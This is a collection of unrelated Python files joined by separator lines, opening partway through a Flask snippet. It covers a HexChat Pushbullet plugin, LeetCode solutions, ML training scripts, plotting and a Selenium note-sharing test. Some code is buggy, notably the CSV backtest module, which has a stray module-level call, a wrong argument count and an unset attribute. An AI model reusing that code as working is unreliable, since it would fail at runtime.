    with app.test_request_context():
        db.create_all()
    app.run()
|
import hexchat
import pushbullet
# HexChat plugin metadata (read by the plugin loader)
__module_name__ = "pushbullet"
__module_version__ = "1.0"
__module_description__ = "Send messages via Pushbullet"
# plugin-preference key under which the API key is stored
CONFIG_APIKEY = 'pushbullet_api_key'
def pushb(word, word_eol, userdata):
    """Hook for /pushb command in HexChat.

    /pushb CONFIG <api_key> stores or shows the API key; any other
    argument string is pushed to the configured Pushbullet account.
    """
    api_key = hexchat.get_pluginpref(CONFIG_APIKEY)
    if word[1] == 'CONFIG':
        if len(word_eol) > 2:
            set_config(word_eol[2])
        else:
            hexchat.prnt('Pushbullet API key currently set to "{}"'
                         .format(api_key))
        return hexchat.EAT_HEXCHAT
    if not api_key:
        hexchat.prnt('\037\00304Pushbullet API key not specified.',
                     ' Use /pushb CONFIG <api_key> to set one.')
        return hexchat.EAT_HEXCHAT
    try:
        pb = pushbullet.Pushbullet(api_key)
    except pushbullet.errors.InvalidKeyError:
        hexchat.prnt('\037\00304Invalid API key!')
        return hexchat.EAT_HEXCHAT
    # Fix: pb was a local of pushb, but push() referenced it as if it
    # were global, raising NameError on every successful push. Pass the
    # client explicitly.
    push(word, word_eol, pb)
    return hexchat.EAT_HEXCHAT


def push(word, word_eol, pb=None):
    """Push word_eol[1] as a Pushbullet link (if it starts with 'http')
    or as a note.

    *pb* is the authenticated pushbullet.Pushbullet client (new optional
    parameter; the original read an undefined global name).
    """
    title = "IRC Message from {}".format(hexchat.get_info('nick'))
    text = word_eol[1]
    if text.startswith('http'):
        pb.push_link(title, text)
    else:
        pb.push_note(title, text)
    hexchat.prnt('Pushed!')
def set_config(api_key):
    """ Sets API key in plugin preferences. """
    # set_pluginpref returns falsy on failure
    if hexchat.set_pluginpref(CONFIG_APIKEY, api_key):
        hexchat.prnt('Pushbullet API key set.')
    else:
        hexchat.prnt('\037\00304Failed to configure Pushbullet plugin!')
# Module body runs at plugin load time: announce and register /pushb.
hexchat.prnt('Pushbullet plugin loaded. Use /pushb to send a message.')
hexchat.hook_command('pushb', pushb)
|
"""
https://leetcode.com/problems/set-matrix-zeroes/
Medium
Given an m x n integer matrix matrix, if an element is 0, set its entire row and column to 0's, and return the matrix.
You must do it in place.
Input: matrix = [[1,1,1],[1,0,1],[1,1,1]]
Output: [[1,0,1],[0,0,0],[1,0,1]]
Input: matrix = [[0,1,2,0],[3,4,5,2],[1,3,1,5]]
Output: [[0,0,0,0],[0,4,5,0],[0,3,1,0]]
"""
from typing import List
class Solution:
    def setZeroes(self, matrix: List[List[int]]) -> None:
        """Zero out every row and column containing a 0, in place.

        Records the coordinates of all original zeros first, then wipes
        the corresponding rows/columns (O(m*n) extra space worst case).
        Returns None; *matrix* is modified in place.
        Fix: removed a leftover debug print of the whole matrix.
        """
        zeros = []
        for i in range(len(matrix)):
            for j in range(len(matrix[i])):
                if matrix[i][j] == 0:
                    zeros.append((i, j))

        def _zero_row_col(i, j):
            # wipe row i and column j
            for k in range(len(matrix[i])):
                matrix[i][k] = 0
            for k in range(len(matrix)):
                matrix[k][j] = 0

        for i, j in zeros:
            _zero_row_col(i, j)
class Solution2(object):
    def setZeroes(self, matrix):
        """
        :type matrix: List[List[int]]
        :rtype: void Do not return anything, modify matrix in-place instead.
        """
        n_rows, n_cols = len(matrix), len(matrix[0])
        zero_rows, zero_cols = set(), set()
        # first pass: remember which rows and columns contain a zero
        for r in range(n_rows):
            for c in range(n_cols):
                if matrix[r][c] == 0:
                    zero_rows.add(r)
                    zero_cols.add(c)
        # second pass: clear every cell on a marked row or column
        for r in range(n_rows):
            for c in range(n_cols):
                if r in zero_rows or c in zero_cols:
                    matrix[r][c] = 0
# Demo runs. setZeroes mutates in place and returns None, so the
# "Solution :" lines always print None — inspect `matrix` instead.
matrix = [[0,1,2,0],[3,4,5,2],[1,3,1,5]]
print ("Input : {}".format(matrix))
ans = Solution().setZeroes(matrix)
print ("Solution : {}".format(ans))
matrix = [[1,1,1],[1,0,1],[1,1,1]]
print ("Input : {}".format(matrix))
ans = Solution().setZeroes(matrix)
print ("Solution : {}".format(ans))
|
import os, shutil, re
def str2time(text):
    """Convert an 'H:MM:SS.cc' subtitle timestamp to seconds (float)."""
    hours, minutes, seconds = text.split(':')
    return 3600 * int(hours) + 60 * int(minutes) + float(seconds)
def get_error_log(lines):
    """Validate subtitle lines (ASS-style Style/Dialogue records — TODO
    confirm format) and return a list of error strings, or ['OK'].

    Checks styles, positions, time gaps and frame-timing overlaps
    between consecutive Dialogue lines. Any parsing failure on a line is
    reported as an unknown error rather than aborting the scan.
    """
    error_log = []
    prev_end_time = 0
    prev_line = ''
    for idx, line in enumerate(lines):
        try:
            # Validate Style
            if line.startswith('Style') and \
                    ('panton' not in line.lower() or 'arial' in line.lower()):
                error_log.append(f"Line {idx+1}: incorrect style")
            if line.startswith('Dialogue'):
                # field 1 is the start time, field 2 the end time
                start_time = str2time(line.split(',')[1])
                # Validate Position
                position = int(line.split(',')[7])
                if 'start' in line.lower() and 'tiempo' in line.lower() and position != 550:
                    error_log.append(f"Line {idx+1}: position of 'Tiempo' != 550")
                if position >= 600:
                    error_log.append(f"Line {idx+1}: position >= 600")
                # Validate Time
                if start_time - prev_end_time >= 10:
                    error_log.append(f"Line {idx+1}: there is a time gap >= 10s with the previous line")
                # Validate Frames timing
                if prev_end_time >= start_time and \
                        (('INSTRUMENTAL' in prev_line and 'tropicalzone' not in line) or
                         ('tropicalzone' in prev_line)):
                    error_log.append(f"Line {idx+1}: 'INSTRUMENTAL' frame is finishing too late or the next line is starting too early")
                if prev_end_time >= start_time and '.....' in prev_line and '.....' not in line:
                    error_log.append(f"Line {idx+1}: '.....' frame is finishing too late or the next line is starting too early")
                # Validate {\kf0}
                prev_end_time = str2time(line.split(',')[2])
                prev_line = line
        except:
            # deliberately broad: a malformed line must not stop the scan
            error_log.append(f"Unknown error in Line {idx+1}: {line}")
    if len(error_log) == 0:
        error_log = ['OK']
    return error_log
|
#!/usr/bin/python
from sklearn import preprocessing
from numpy import genfromtxt, savetxt
import pandas as pd
from sklearn.ensemble import RandomForestClassifier
from sklearn import preprocessing, svm
from sklearn.preprocessing import OneHotEncoder
from sklearn.externals import joblib
import random
import sys
def RandomForest(file):
    """Train a random forest on the CSV at *file* and write predictions
    for RF_testsample.csv to the path given in sys.argv[2].

    Fix: DataFrame.as_matrix() was removed in pandas 1.0; .values works
    on both old and new pandas versions.
    """
    train = pd.read_csv(file)
    test = pd.read_csv("RF_testsample.csv")
    # feature columns and the label column
    cols = ['conservation','polaritychange','chargechange','hydroindexchange','secondarystruc','asa','sizechange']
    colsRes = ['class']
    trainArr = train[cols].values
    trainRes = train[colsRes].values.ravel()
    rf = RandomForestClassifier(max_features=0.3, n_estimators=100, n_jobs=1, min_samples_leaf=50)
    rf.fit(trainArr, trainRes)
    testArr = test[cols].values
    result = rf.predict(testArr)
    test['predicted4'] = result
    # NOTE(review): the output path comes from sys.argv[2] although the
    # input is a parameter — consider passing the output path in too.
    test.to_csv(sys.argv[2])
    print(test)

RandomForest(sys.argv[1])
|
class Meta(object):
    """Minimal metaclass stand-in: echoes the three class-creation
    arguments (name, bases, namespace) it is constructed with."""

    def __init__(self, name, base, subcls):
        print(self, name, base, subcls)
Base=Meta('','','')
# Because Base is an *instance* of Meta, Python derives the metaclass of
# Test from type(Base) == Meta, so this class statement actually calls
# Meta('Test', (Base,), {...}) and binds the resulting Meta instance to
# the name Test — a classic implicit-metaclass demonstration.
class Test(Base):
    prop1='hello'
|
# Stand-alone bootstrap for the gwhiz Pylons application: load the INI
# config, initialise the Pylons environment, then import the model layer
# (which requires the environment to be configured first).
from paste.deploy import appconfig
from pylons import config
from gwhiz.config.environment import load_environment
# NOTE(review): hard-coded absolute path is machine-specific — consider
# taking it from an environment variable or CLI argument.
conf = appconfig('config:' + '/home/kgraehl/gwhiz.com/development.ini')
load_environment(conf.global_conf, conf.local_conf)
from gwhiz.model import *
|
from collections import defaultdict

paragraph = """The rat sat in a tar pit today. I gave him a tip then. I wished on a star for no rats tonight."""
# Unique whitespace-separated tokens, lower-cased. Punctuation is kept, so
# "today." and "today" would be distinct tokens.
pretty_words = [single_word.lower() for single_word in set(paragraph.split())]
# Group words by their canonical form (letters sorted): anagrams share a key.
# This replaces the original O(n^2) cross-comparison of two dicts with a
# single O(n) grouping pass; the printed groups are identical.
word_comparison = defaultdict(list)
for word in pretty_words:
    # Single-letter tokens ("a", "i") cannot form interesting anagram groups.
    if len(word) > 1:
        word_comparison["".join(sorted(word))].append(word)
# Print only keys with at least two distinct words, i.e. real anagram groups.
for key, value in word_comparison.items():
    if len(value) > 1:
        print(value)
|
filename = 'PA_final.txt'
filename1 = 'PA_final1.txt'
filename2 = 'PR_final1.txt'
# Split the source file into two outputs: of every 6-line record, lines 0-2
# go to filename1 and lines 3-5 go to filename2.
with open(filename) as f:
    data = f.read().split('\n')
# Context managers guarantee both outputs are flushed and closed even if a
# write fails part-way through (the original closed them only on success).
with open(filename1, 'w') as f1, open(filename2, 'w') as f2:
    for num, line in enumerate(data):
        if num % 6 < 3:
            f1.write(line)
            f1.write('\n')
        else:
            f2.write(line)
            f2.write('\n')
|
#! /usr/bin/python
import sys
def read_list(utt2spk_file):
    """
    Parse a Kaldi-style utt2spk file into a dict {utt_id: spkr_id}.

    Each line is "utt_id ... spkr_id": the first space-separated token is
    taken as the utterance id and the last as the speaker id (intermediate
    tokens, if any, are ignored).
    """
    utt_dict = {}
    # 'with' guarantees the file is closed even if parsing raises.
    with open(utt2spk_file) as fin:
        for line in fin:
            # Split once per line instead of once per field.
            # split(' ') (not split()) is kept deliberately: it preserves the
            # original behavior for runs of multiple spaces.
            fields = line.strip().split(' ')
            utt_dict[fields[0].strip()] = fields[-1].strip()
    return utt_dict
if __name__=='__main__':
    """
    Takes train and test utt2spk files and returns a list of trials and a
    corresponding key file.
    inputs:
        1. train utt2spk,
        2. test utt2spk,
        3. output trial filename
    outputs:
        1. output trial        (one "train_utt<TAB>test_utt<TAB>key" per line)
        2. output keys ==> name will be [trial_filename.key]
    """
    trn_utt2spk = sys.argv[1]
    tst_utt2spk = sys.argv[2]
    trials_filename = sys.argv[3]
    trn_utt = read_list(trn_utt2spk)
    tst_utt = read_list(tst_utt2spk)
    # Context managers close both outputs even if a write fails; .items()
    # avoids a second dict lookup per utterance.
    with open(trials_filename, 'w') as ftrials, \
         open(trials_filename + '.key', 'w') as fkey:
        # Full cross-product: every test utterance against every train utterance.
        for tst_id, tst_spkr in tst_utt.items():
            for trn_id, trn_spkr in trn_utt.items():
                # 'target' when both utterances come from the same speaker.
                key_val = 'target' if trn_spkr == tst_spkr else 'nontarget'
                ftrials.write(trn_id + '\t' + tst_id + '\t' + key_val + '\n')
                fkey.write(key_val + '\n')
|
import math
class Neuron():
    """A single artificial neuron: weighted sum of inputs plus an activation.

    Inputs and weights are accumulated via add_x/add_weights; summator()
    adds dot(x, w) + bias into self.sum (it does NOT reset it), and the
    *_func methods store the activation in self.y.
    """

    def __init__(self):
        self.x = []    # input values
        self.w = []    # weights, parallel to self.x
        self.sum = 0   # accumulated weighted sum (persists across calls)
        self.y = 0     # last activation output

    def add_weights(self, *args):
        """Append one or more weights."""
        self.w.extend(args)

    def add_x(self, *args):
        """Append one or more input values."""
        self.x.extend(args)

    def summator(self, b=0):
        """Accumulate dot(x, w) + bias b into self.sum."""
        self.sum += sum(self.x[idx] * self.w[idx] for idx in range(len(self.x))) + b

    def step_func(self, z=0):
        """Heaviside step activation with threshold z."""
        self.y = 1 if self.sum >= z else 0

    def sigmoid_func(self):
        """Logistic activation, saturated to exactly 0/1 outside (0.01, 0.99)."""
        activation = 1 / (1 + math.exp(-self.sum))
        if activation > 0.99:
            self.y = 1
        elif activation < 0.01:
            self.y = 0
        else:
            self.y = activation

    def clear_all(self):
        """Reset inputs, weights, accumulated sum and output."""
        self.x = []
        self.w = []
        self.sum = 0
        self.y = 0
''' Test
network = Neuron()
network.add_x(1, 1)
network.add_weights(-2, 5)
network.summator()
network.step_func()
print(f'Step function: {network.y}')
network.sigmoid_func()
print(f'Sigmoid function: {network.y}')
'''
|
"""Model class template
This module provides a template for users to implement custom models.
You can specify '--model template' to use this model.
The class name should be consistent with both the filename and its model option.
The filename should be <model>_model.py
The class name should be <Model>Model
It implements a simple image-to-image translation baseline based on regression loss.
Given input-output pairs (data_A, data_B), it learns a network netG that can minimize the following L1 loss:
min_<netG> ||netG(data_A) - data_B||_1
You need to implement the following functions:
<modify_commandline_options>: Add model-specific options and rewrite default values for existing options.
<__init__>: Initialize this model class.
<set_input>: Unpack input data and perform data pre-processing.
<forward>: Run forward pass. This will be called by both <optimize_parameters> and <test>.
<optimize_parameters>: Update network weights; it will be called in every training iteration.
"""
import torch
from torch.autograd import Variable
from .base_model import BaseModel
from . import networks
from . import pwclite
class WarpModel(BaseModel):
    """Image-warping model: a frozen PWC-Lite flow generator (netFG) feeds
    optical flow into a trainable warping/segmentation network (netFW),
    supervised with an MSE loss on both frames."""

    @staticmethod
    def modify_commandline_options(parser, is_train=True):
        """Add new model-specific options and rewrite default values for existing options.
        Parameters:
            parser   -- the option parser
            is_train -- if it is training phase or test phase. You can use this flag to add training-specific or test-specific options.
        Returns:
            the modified parser.
        """
        parser.set_defaults(dataset_mode='visha', lr=5e-3, batch_size=8, preprocess='resize', load_size=512, no_epoch=True, save_by_iter=True, load_iter=50000, print_freq=1, display_ncols=10)
        parser.add_argument('--weight_decay', type=float, default=5e-4, help='weight decay for optimizer')
        parser.add_argument('--momentum', type=float, default=0.9, help='momentum for sgd optimizer')
        parser.add_argument('--num_classes', type=int, default=1, help='number of classes')
        parser.add_argument('--backbone', type=str, default='mobilenet', help='backbone net type')
        parser.add_argument('--output_stride', type=int, default=16, help='number of output stride')
        parser.add_argument('--sync_bn', default=None, help='synchronized batchnorm or not')
        parser.add_argument('--freeze_bn', default=False, help='freeze bacthnorm or not')
        parser.add_argument('--iter_num', type=int, default=50000, help='number of iterations')
        parser.add_argument('--lr_decay', type=float, default=0.9, help='learning rate decay rate')
        parser.add_argument('--pretrained_model', default='checkpoints/pwclite_ar.tar')
        parser.add_argument('--test_shape', default=[448, 1024], type=int, nargs=2)
        parser.add_argument('--n_frames', type=int, default=2)
        parser.add_argument('--upsample', default=True)
        parser.add_argument('--reduce_dense', default=True)
        return parser

    def __init__(self, opt):
        """Initialize this model class.
        Parameters:
            opt -- training/test options
        A few things can be done here.
        - (required) call the initialization function of BaseModel
        - define loss function, visualization images, model names, and optimizers
        """
        BaseModel.__init__(self, opt)  # call the initialization method of BaseModel
        # specify the training losses you want to print out. The program will call base_model.get_current_losses to plot the losses to the console and save them to the disk.
        self.loss_names = ['first', 'second', 'sum']
        # specify the images you want to save and display. The program will call base_model.get_current_visuals to save and display these images.
        self.visual_names = ['data_A1', 'data_A2', 'data_B1', 'data_B2', 'flow12', 'flow21', 'transflow12', 'transflow21', 'pred1', 'pred2']
        # specify the models you want to save to the disk. The program will call base_model.save_networks and base_model.load_networks to save and load networks.
        # you can use opt.isTrain to specify different behaviors for training and test. For example, some networks will not be used during test, and you don't need to load them.
        self.model_names = ['FW']
        # define networks; you can use opt.isTrain to specify different behaviors for training and test.
        self.netFW = networks.define_fw(opt.num_classes, opt.backbone, opt.output_stride, opt.sync_bn, opt.freeze_bn, gpu_ids=self.gpu_ids)
        # The flow generator is loaded from a pretrained checkpoint and kept
        # in eval mode — only netFW is trained.
        self.netFG = pwclite.PWCLite(opt).to(self.device)
        self.netFG = pwclite.restore_model(self.netFG, opt.pretrained_model)
        self.netFG.eval()
        if self.isTrain:  # only defined during training time
            # define your loss functions. You can use losses provided by torch.nn such as torch.nn.L1Loss.
            self.criterionFlow = torch.nn.MSELoss()
            # Backbone parameters train at base lr, head parameters at 10x lr.
            # NOTE(review): the .module access assumes netFW is wrapped
            # (e.g. in DataParallel) — confirm define_fw always wraps it.
            self.train_params = [{'params': self.netFW.module.get_1x_lr_params(), 'lr': opt.lr},
                                 {'params': self.netFW.module.get_10x_lr_params(), 'lr': opt.lr * 10}]
            self.optimizer = torch.optim.SGD(self.train_params, lr=opt.lr, momentum=opt.momentum, weight_decay=opt.weight_decay, nesterov=False)
            self.optimizers = [self.optimizer]
        # Our program will automatically call <model.setup> to define schedulers, load networks, and print networks

    def set_input(self, input):
        """Unpack input data from the dataloader and perform necessary pre-processing steps.
        Parameters:
            input: a dictionary that contains the data itself and its metadata information.
            Expected keys: 'A1'/'A2' (consecutive input frames), 'B1'/'B2'
            (their targets) and 'A_paths'.
        """
        self.data_A1 = Variable(input['A1']).to(self.device)  # get image data A
        self.data_B1 = Variable(input['B1']).to(self.device)  # get image data B
        self.data_A2 = Variable(input['A2']).to(self.device)
        self.data_B2 = Variable(input['B2']).to(self.device)
        self.image_paths = input['A_paths']  # get image paths

    def forward(self):
        """Run forward pass. This will be called by both functions <optimize_parameters> and <test>."""
        # PWC-Lite expects inputs at test_shape, so resize both frames before
        # stacking them along the channel dimension.
        flow_input1 = torch.nn.functional.interpolate(self.data_A1, size=self.opt.test_shape, mode='bilinear', align_corners=True)
        flow_input2 = torch.nn.functional.interpolate(self.data_A2, size=self.opt.test_shape, mode='bilinear', align_corners=True)
        flow_input = torch.cat([flow_input1, flow_input2], 1)
        flow = self.netFG(flow_input)
        # Resize forward/backward flows back to the (square) load_size the
        # rest of the pipeline works at.
        self.flow12 = pwclite.resize_flow(flow['flows_fw'][0], (self.opt.load_size, self.opt.load_size))
        self.flow21 = pwclite.resize_flow(flow['flows_bw'][0], (self.opt.load_size, self.opt.load_size))
        self.pred1, self.pred2, self.transflow12, self.transflow21 = self.netFW(self.data_A1, self.data_A2, self.flow12, self.flow21)

    def backward(self):
        """Calculate losses, gradients, and update network weights; called in every training iteration"""
        # MSE on both frames' predictions; the sum is what gets backpropagated.
        self.loss_first = self.criterionFlow(self.pred1, self.data_B1)
        self.loss_second = self.criterionFlow(self.pred2, self.data_B2)
        self.loss_sum = self.loss_first + self.loss_second
        self.loss_sum.backward()

    def optimize_parameters(self):
        """Update network weights; it will be called in every training iteration."""
        self.optimizer.zero_grad()  # clear network G's existing gradients
        self.forward()              # first call forward to calculate intermediate results
        self.backward()             # calculate gradients for network G
        self.optimizer.step()       # update gradients for network G

    def update_learning_rate(self, curr_iter):
        """Update learning rates for all the networks; called at the end of every epoch
        (or every iteration with --no_epoch, using polynomial decay)."""
        if not self.opt.no_epoch:
            # Epoch mode: delegate to the schedulers created by BaseModel.setup.
            old_lr = self.optimizers[0].param_groups[0]['lr']
            for scheduler in self.schedulers:
                if self.opt.lr_policy == 'plateau':
                    scheduler.step(self.metric)
                else:
                    scheduler.step()
            lr = self.optimizers[0].param_groups[0]['lr']
            print('learning rate %.7f -> %.7f' % (old_lr, lr))
        if self.opt.no_epoch:
            # Iteration mode: polynomial ("poly") decay, with the second param
            # group (the 10x head) kept at 10x the base rate.
            old_lr = self.optimizers[0].param_groups[0]['lr']
            self.optimizers[0].param_groups[0]['lr'] = 1 * self.opt.lr * (1 - float(curr_iter) / self.opt.iter_num) ** self.opt.lr_decay
            self.optimizers[0].param_groups[1]['lr'] = 10 * self.opt.lr * (1 - float(curr_iter) / self.opt.iter_num) ** self.opt.lr_decay
            lr = self.optimizers[0].param_groups[0]['lr']
            print('learning rate %.7f -> %.7f' % (old_lr, lr))
|
__author__ = 'mehdi'
import numpy as np
import csv
from Comparision import Calculations
class IO:
    """Python 2 CSV loader: reads a string matrix, strips the header row and
    first column, and coerces the remainder to floats in self.float_data.

    Missing cells (':' or empty) become 0 when isshareprice is true,
    otherwise -1 (a sentinel for "no data")."""
    def __init__(self, file_address, isshareprice):
        # Load the raw CSV as strings; errors are printed and swallowed,
        # so a failed load leaves self.text_data undefined and the code
        # below raises AttributeError.
        try:
            self.text_data = np.loadtxt(file_address,
                                        delimiter=',',
                                        dtype='str')
        except Exception, e:
            print str(e)
        # Numeric matrix sized without the header row/column.
        self.float_data = np.zeros((len(self.text_data)-1, len(self.text_data[1])-1))
        for count_row in xrange(1, len(self.text_data)):
            for count_col in xrange(1, len(self.text_data[count_row])):
                if self.text_data[count_row][count_col] == ':' or self.text_data[count_row][count_col] == "":
                    if isshareprice:
                        self.float_data[count_row-1][count_col-1] = 0
                    else:
                        self.float_data[count_row-1][count_col-1] = -1
                else:
                    self.float_data[count_row-1][count_col-1] = float(self.text_data[count_row][count_col])
    @staticmethod
    def write(output_address, parameter):
        # Dump a numeric matrix back to CSV.
        np.savetxt(output_address, parameter, delimiter=",")
    @staticmethod
    def main():
        # Run the comparison/investment backtest three times with
        # increasingly many long/short positions (1, 3, 5), writing the
        # cash/investment series to hard-coded Desktop paths.
        short_positions = 1
        long_positions = 1
        employment_data = IO('/home/mehdi/Desktop/Productivity.csv', False)
        price_data = IO('/home/mehdi/Desktop/NS_M_CLI.csv', True)
        start_calculations = Calculations(1000, price_data.float_data, employment_data.float_data)
        start_calculations.comparison(long_positions, short_positions)
        start_calculations.investment_algor()
        IO.write('/home/mehdi/Desktop/results1_C.csv', start_calculations.investment)
        IO.write('/home/mehdi/Desktop/results1_I.csv', start_calculations.cash)
        short_positions = 3
        long_positions = 3
        start_calculations = Calculations(1000, price_data.float_data, employment_data.float_data)
        start_calculations.comparison(long_positions, short_positions)
        start_calculations.investment_algor()
        IO.write('/home/mehdi/Desktop/results2_C.csv', start_calculations.investment)
        IO.write('/home/mehdi/Desktop/results2_I.csv', start_calculations.cash)
        short_positions = 5
        long_positions = 5
        start_calculations = Calculations(1000, price_data.float_data, employment_data.float_data)
        start_calculations.comparison(long_positions, short_positions)
        start_calculations.investment_algor()
        IO.write('/home/mehdi/Desktop/results3_C.csv', start_calculations.investment)
        IO.write('/home/mehdi/Desktop/results3_I.csv', start_calculations.cash)
    @staticmethod
    def main1():
        # NOTE(review): broken as written — IO.__init__ takes two arguments
        # but three are passed, and IO has no clear_dataset method;
        # presumably Clean_dataset('/home/mehdi/Desktop/CLI.csv') was
        # intended. Raises TypeError if ever called.
        employment_data = IO('/home/mehdi/Desktop/Employment_data.csv', '/home/mehdi/Desktop/CLI.csv', False)
        employment_data.clear_dataset()
employment_data.clear_dataset()
class Clean_dataset:
    """Loads a raw CSV and regroups column-4 values by the column-3 key,
    writing the transposed groups to CLI_Out.csv (Python 2 code)."""
    def __init__(self, file_address):
        self.clear_data = []
        # Errors are printed and swallowed; a failed load leaves
        # self.text_data undefined.
        try:
            self.text_data = np.loadtxt(file_address,
                                        delimiter=',',
                                        dtype='str')
        except Exception, e:
            print str(e)
    def clear_dataset(self):
        # NOTE(review): iterates self.text_data1, which is never assigned
        # (__init__ stores self.text_data) — this method raises
        # AttributeError as written; presumably text_data was intended.
        i = -1
        for count_row in xrange(0, len(self.text_data1)):
            # A new value in column 3 starts a new output group. Note that
            # row 0 is compared against row -1 (the last row) because of
            # Python's negative indexing.
            if self.text_data1[count_row][3] != self.text_data1[count_row-1][3]:
                i += 1
                self.clear_data.append([])
            self.clear_data[i].append(self.text_data1[count_row][4])
        with open('/home/mehdi/Desktop/CLI_Out.csv', 'wb') as out_file:
            wr = csv.writer(out_file, quoting=csv.QUOTE_ALL)
            # map(None, *rows) is the Python 2 transpose-with-None-padding
            # idiom (itertools.zip_longest in Python 3).
            wr.writerows(map(list, map(None, *self.clear_data)))
        # Redundant: the with-block has already closed the file.
        out_file.close()
IO.main()
|
import logging
import sys, os
import re
import argparse
labelSize = 20   # font size (pt) for the x/y axis labels
legendSize = 20  # font size (pt) for the legend entries
titleSize = 36   # font size (pt) for the plot title
def drawLine(xList, yList, resultFile, legends = None, xLabel = None, yLabel = None, title = None, colorList = None, opacity = 0.6, xRange = None, yRange = None, marker = "o"):
    """Plot one line per (xSubList, ySubList) pair and save the figure.

    Parameters:
        xList, yList -- parallel lists of per-line x and y sequences
        resultFile   -- output path stem; both <stem>.pdf and <stem>.png are written
        legends      -- optional legend label per line
        xLabel/yLabel/title -- optional axis labels and title
        colorList    -- optional matplotlib color per line
        opacity      -- alpha applied to every line
        xRange/yRange -- optional (min, max) axis limits
        marker       -- marker style applied to every line
    """
    import matplotlib
    #matplotlib.use('Agg')
    import matplotlib.pyplot as plt
    logger = logging.getLogger(__name__)
    figure, axis = plt.subplots()
    # Booleans, not 'off': the 'on'/'off' string values for tick_params were
    # deprecated in matplotlib 2.2 and rejected by 3.x.
    axis.tick_params(labeltop=False, labelright=False)
    # plot the lines
    lineObjList = []
    for xSubList, ySubList in zip(xList, yList):
        lineObj = plt.plot(xSubList, ySubList)
        lineObj[0].set_alpha(opacity)
        lineObj[0].set_marker(marker)
        lineObjList.append(lineObj[0])
    if colorList is not None:
        for lineObj, color in zip(lineObjList, colorList):
            lineObj.set_color(color)
    logger.info("%d lines drawn", len(lineObjList))
    # set up min/max of the axes
    if xRange is not None:
        plt.xlim(xRange)
    if yRange is not None:
        plt.ylim(yRange)
    # set up labels of x and y axis
    if xLabel is not None:
        plt.xlabel(xLabel, fontsize = labelSize)
    if yLabel is not None:
        plt.ylabel(yLabel, fontsize = labelSize)
    # set up title
    if title is not None:
        plt.title(title, fontsize = titleSize)
    # set up legends
    if legends is not None:
        plt.legend(lineObjList, legends, fontsize = legendSize)
    # save to file
    figure.savefig(resultFile + ".pdf", format = "pdf")
    figure.savefig(resultFile + ".png", format = "png")
    # Close (not just clear) the figure so repeated calls don't leak memory;
    # plt.clf() left the figure registered with pyplot forever.
    plt.close(figure)
if __name__ == "__main__":
    # CLI: resultFile [-limit N] [-startIndex I] -sourceFileList f1 f2 ...
    # One latency series is read from each source file and plotted together.
    parser = argparse.ArgumentParser("latency plot")
    parser.add_argument("resultFile", type = str)
    parser.add_argument("-limit", default = 10, type = int)
    parser.add_argument("-startIndex", default = 0, type = int)
    parser.add_argument("-sourceFileList", nargs = "+", type = str)
    options = parser.parse_args()
    sourceFileList = options.sourceFileList
    resultFile = options.resultFile
    limit = options.limit
    availableLegends = ["End2End", "Trigger", "Trigger + Realtime", "Trigger + Action", "Trigger + Action + Realtime"]
    availableColorList = ["b", "g", "r", "c", "m"]
    xList, yList = [], []
    if len(sourceFileList) > len(availableLegends):
        print("provide too much files")
        sys.exit(1)
    # Read at most `limit` samples per file: x is the 1-based sample number,
    # y is the latency value on that line.
    for sourceFile in sourceFileList:
        sampleNumbers, latencies = [], []
        with open(sourceFile, "r") as fd:
            for sampleNo, rawLine in enumerate(fd, start=1):
                latency = float(rawLine.strip())
                latencies.append(latency)
                sampleNumbers.append(sampleNo)
                if sampleNo >= limit:
                    break
        xList.append(sampleNumbers)
        yList.append(latencies)
    lineNum = len(sourceFileList)
    legends = availableLegends[options.startIndex: options.startIndex + lineNum]
    xLabel = "Test No"
    yLabel = "Latency (Seconds)"
    drawLine(xList, yList, resultFile = resultFile, legends = legends, xLabel = xLabel, yLabel = yLabel, colorList = availableColorList[:lineNum], xRange = (0, limit + 1))
|
# -*- coding: utf-8 -*-
from selenium.common.exceptions import WebDriverException
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
import time
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common import exceptions
from sbase import NimbusSeleniumBaseTestCase
from attachment import AttachmentBaseTest
import json
class TestUi(NimbusSeleniumBaseTestCase, AttachmentBaseTest):
    @staticmethod
    def move_to(element, driver):
        """Hover the mouse pointer over *element*."""
        m_over = ActionChains(driver).move_to_element(element)
        m_over.perform()
    @staticmethod
    def _get_folder_id_by_object(folder_object):
        """Return the DOM id attribute of *folder_object*'s parent node."""
        parent_folder = folder_object.find_element_by_xpath('..')
        return parent_folder.get_attribute("id")
    def setUp(self):
        # Generous implicit wait plus a fixed pause: the UI renders slowly.
        self.driver.implicitly_wait(100)
        time.sleep(3)
    def _default_state(self):
        """Navigate back to the default "My Notes" folder."""
        self.driver.get(self.url)
        time.sleep(6)
        my_notes_menu_item = self.driver.find_element_by_css_selector("li#default")
        # NOTE(review): .perform() is never called on this chain, so the
        # hover is a no-op as written.
        ActionChains(self.driver).move_to_element(my_notes_menu_item)
        time.sleep(1)
        my_notes_menu_item.click()
        time.sleep(4)
    def _substract_px(self, data_to_format):
        """Convert a CSS size string such as "207px" to the integer 207."""
        data_to_format = int(data_to_format[:-2])
        return data_to_format
    def _select_folder_by_name(self, name):
        """Locate a sidebar folder element by its title attribute."""
        return self.driver.find_element_by_css_selector(".folder_short.ng-binding[title='" + name + "']")
    def _get_shared_link(self):
        """Create a folder + note + attachment via the API, share the note
        through the UI, open the resulting public link and return the
        attachment filename."""
        note_text = u"Some text"
        folder_name = self._get_random_name(16)
        folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
        self.driver.refresh()
        time.sleep(2)
        folder = self._select_folder_by_name(folder_name)
        folder.click()
        time.sleep(2)
        note_data = self._create_note_without_ui(
            title = u"test_note",
            text = note_text,
            global_id = self._get_random_name(16),
            parent_id=folder_data["global_id"]
        )["body"]["notes"][0]
        time.sleep(4)
        note_id = note_data["global_id"]
        attach_fname = '114-1024.JPG'
        fixture_file = self.check_fixture_file(attach_fname)
        attach = self._do_attachment_upload(fixture_file=fixture_file,
                                            note_id=note_id, in_list= True)
        time.sleep(2)
        folder.click()
        self.driver.refresh()
        time.sleep(2)
        share_unshare_button = self.driver.find_element_by_css_selector(".head_note a.share")
        self.assertIsNotNone(share_unshare_button)
        time.sleep(2)
        share_unshare_button.click()
        time.sleep(5)
        # The share dialog exposes the public URL in a read-only input field.
        link = self.driver.find_element_by_css_selector(".share_url .url_password")
        link_text = link.get_attribute("value")
        ok = self.driver.find_element_by_css_selector(".title_password .remove_select")
        ok.click()
        self.driver.get(link_text)
        return attach_fname
